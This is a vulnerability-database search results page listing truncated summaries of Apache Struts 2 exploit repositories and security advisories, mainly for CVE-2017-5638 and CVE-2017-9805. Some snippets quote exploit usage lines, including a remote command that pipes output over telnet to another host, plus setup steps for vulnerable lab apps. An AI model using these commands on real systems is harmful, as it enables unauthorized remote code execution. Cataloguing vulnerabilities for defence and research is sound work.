Lucene search
+L

111 matches found

Kitploit
Kitploit
added 2026/09/14 6:23 p.m.10 views

struts2-rce

CVE-2017-5638 のエクスプロイトデモ 完全に https://github.com/piesecurity/apache-struts2-CVE-2017-5638 に基づいています 使用方法: 前提条件: python、docker、maven、jdk がインストールされていること 1. このリポジトリをクローンする 2. プロジェクトルートで mvn clean package を実行する 3. docker build -t hack . を実行する 4. docker run -d -p 8080:8080 hack を実行する 5...

10CVSS8AI score0.99999EPSS
SaveExploits46References2
Kitploit
Kitploit
added 2026/09/14 12:33 p.m.4 views

-CVE-2017-9805

脆弱性情報 リソース: https://vulners.com/cve/CVE-2017-9805 これは何ですか? S2-052 に対して脆弱な Struts2 をホストするシステムのシェルにリモートコマンドを実行できる Python エクスプロイトスクリプトです。 使用方法 ╭─root@blackshell / ╰─ python s2-052.py --target 'http://192.168.0.233/orders/3' --command "echo pwned | telnet 192.168.0.122 1234" root@kitploit: Apache...

8.1CVSS7.2AI score0.99396EPSS
SaveExploits24
Kitploit
Kitploit
added 2026/09/14 5:55 a.m.3 views

struts_rest_rce_fuzz-CVE-2017-9805-

このリポジトリには README がありません。...

8.1CVSS7.2AI score0.99396EPSS
SaveExploits24
Kitploit
Kitploit
added 2026/09/14 12:27 a.m.3 views

CVE-2017-9805

CVE-2017-9805 CVE-2017-9805 POC この問題は、RESTプラグインで使用されるデシリアライゼーションクラスに対するフィルタリングの欠如に起因します。StrutsはXstreamを使用しており、複数の場所でデシリアライゼーションに対して多くのフィルタリングを適用していますが、RESTプラグインではこのフィルタリングが適用されていませんでした。...

8.1CVSS7.4AI score0.99396EPSS
SaveExploits24
Kitploit
Kitploit
added 2026/09/13 9:27 p.m.9 views

struts2-rce-cve-2017-9805-ruby

Struts2 脆弱性 - CVE-2017-9805 説明 Apache Struts2 REST プラグイン XStream RCE CVE-2017-9805 使用方法 root@kitploit: Usage: cve20179805poc.rb targeturi cmd ruby cve20179805poc.rb 127.0.0.1 ping -c 4 192.168.0.1...

8.1CVSS7.5AI score0.99396EPSS
SaveExploits24
Kitploit
Kitploit
added 2026/09/13 7:11 p.m.4 views

struts-s2-052-deserialization-rce-lab

Apache Struts S2-052 XML 反序列化远程代码执行 本仓库演示了如何利用恶意 XML 反序列化来攻击 Apache Struts S2-052(CVE-2017-9805) 。 该漏洞利用程序是在完成 INE eWPTX 实践靶场 – Struts XML 反序列化 RCE 实验 时开发的。 漏洞概述 Apache Struts REST 插件使用 XStream 对 XML 请求进行反序列化。 当应用程序处理带有以下内容的 XML 时: Content-Type: application/xml 攻击者可以提供一个恶意的序列化对象图,从而通过以下方式触发任意命令的执...

8.1CVSS7.6AI score0.99396EPSS
SaveExploits24
Kitploit
Kitploit
added 2026/09/12 9:47 p.m.12 views

Struts2Vuln

脆弱なStruts2アプリケーション 必要条件 1. Maven https://maven.apache.org 2. Struts = 2.5.10 CVE-2017-5638 - Apache Struts 2 マルチパートフォーム RCE 必要条件 1. マルチパートフォームのPOSTを発行するURLを見つける はじめに 1. アプリケーション/サーバーは以下のmavenコマンドで起動できます: mvn jetty:run. 2. 次のURL http://localhost:8080/fileupload に対してエクスプロイト...

10CVSS8.2AI score0.99999EPSS
SaveExploits46
Kitploit
Kitploit
added 2026/09/12 12:37 p.m.8 views

CVE-2017-9805

CVE-2017-9805:Apache Struts 2 S2-052 RCE 分析 该仓库包含针对 Apache Struts 2 S2-052 中 XStream 反序列化 漏洞的技术细节和概念验证 PoC。 📌 漏洞信息 CVE 编号: CVE-2017-9805 漏洞类型: 远程代码执行 RCE 风险等级: 高危 9.8/10 案例分析: 哈佛大学 - OTD http://otd.harvard.edu/contact-us/ 🔍 技术概述 此漏洞源于 Apache Struts REST 插件在处理 XML 数据时不安全地使用了 XStream 库。攻击者可通过发送特制 X...

8.1CVSS7.4AI score0.99396EPSS
SaveExploits24References1
Kitploit
Kitploit
added 2026/09/08 11:31 p.m.5 views

struts2-rce

CVE-2017-5638 のエクスプロイトデモ 完全に基づく: https://github.com/piesecurity/apache-struts2-CVE-2017-5638 フレームワークのリファレンスプロジェクトがコンテナにデプロイされるが、悲惨な結果を招く現実的なシナリオ。慣れるためにコードを見てコンパイルしてください。また、dockerfileを調査してください - 何か特定の点が注意を引くでしょうか? 日常の判断と連鎖する複数の脆弱性がいかに簡単に悪用されるかを示しています。 使い方: 前提条件: 1. JDKがインストールされていること, 2...

10CVSS8AI score0.99999EPSS
SaveExploits46References2
GithubExploit
GithubExploit
added 2026/08/09 12:17 a.m.28 views

Exploit for CVE-2026-64638

CVE-2026-64638 — XSS2Shell WordPress Pre-Auth Reflected XSS...

8.9CVSS6.1AI score0.31204EPSS
SaveExploits33
GithubExploit
GithubExploit
added 2026/01/04 6:57 p.m.263 views

Exploit for Deserialization of Untrusted Data in Apache Struts

CVE-2017-9805: Apache Struts 2 S2-052 RCE Analizi Bu depo, Ap...

8.1CVSS8.5AI score0.99396EPSS
SaveExploits24
EUVD
EUVD
added 2025/10/07 12:30 a.m.12 views

EUVD-2018-0714

Malware in sbrugna...

6.2CVSS6.5AI score0.04889EPSS
SaveExploits2References10
NVD
NVD
added 2023/04/16 8:15 a.m.34 views

CVE-2023-27610

Auth. admin+ SQL Injection SQLi vulnerability in TransbankDevelopers Transbank Webpay REST plugin = 1.6.6 versions...

7.2CVSS6.6AI score0.00695EPSS
SaveExploits0References1
Cvelist
Cvelist
added 2023/04/16 7:41 a.m.41 views

CVE-2023-27610 WordPress Transbank Webpay REST Plugin <= 1.6.6 is vulnerable to SQL Injection

Auth. admin+ SQL Injection SQLi vulnerability in TransbankDevelopers Transbank Webpay REST plugin = 1.6.6 versions...

5.5CVSS7.7AI score0.00695EPSS
SaveExploits0References1
F5 Networks
F5 Networks
added 2023/02/21 7:00 p.m.47 views

K27638900: Apache Struts vulnerability CVE-2017-15707

Security Advisory Description In Apache Struts 2.5 to 2.5.14, the REST Plugin is using an outdated JSON-lib library which is vulnerable and allow perform a DoS attack using malicious request with specially crafted JSON payload. CVE-2017-15707 Impact There is no impact; F5 products are not affecte...

6.2CVSS6.6AI score0.04889EPSS
SaveExploits2
F5 Networks
F5 Networks
added 2023/02/21 6:47 p.m.512 views

K84144321: Apache Struts vulnerability CVE-2017-9805

Security Advisory Description The REST Plugin in Apache Struts 2.1.2 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads...

8.1CVSS7.9AI score0.99396EPSS
SaveExploits24
SUSE CVE
SUSE CVE
added 2023/02/15 5:05 a.m.29 views

SUSE CVE-2016-3087

Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via vectors related to an ! exclamation mark operator to the REST Plugin...

9.8CVSS8.1AI score0.81873EPSS
SaveExploits5References3
SUSE CVE
SUSE CVE
added 2023/02/15 5:02 a.m.10 views

SUSE CVE-2016-4438

The REST plugin in Apache Struts 2 2.3.19 through 2.3.28.1 allows remote attackers to execute arbitrary code via a crafted expression...

9.8CVSS8AI score0.16742EPSS
SaveExploits2References3
SUSE CVE
SUSE CVE
added 2023/02/15 4:44 a.m.12 views

SUSE CVE-2017-9793

The REST Plugin in Apache Struts 2.1.x, 2.3.7 through 2.3.33 and 2.5 through 2.5.12 is using an outdated XStream library which is vulnerable and allow perform a DoS attack using malicious request with specially crafted XML payload...

7.5CVSS9.4AI score0.08787EPSS
SaveExploits0References3
SUSE CVE
SUSE CVE
added 2023/02/15 4:34 a.m.11 views

SUSE CVE-2018-1327

The Apache Struts REST Plugin is using XStream library which is vulnerable and allow perform a DoS attack when using a malicious request with specially crafted XML payload. Upgrade to the Apache Struts version 2.5.16 and switch to an optional Jackson XML handler as described here...

7.5CVSS9.4AI score0.08647EPSS
SaveExploits1References3
Rows per page
Query Builder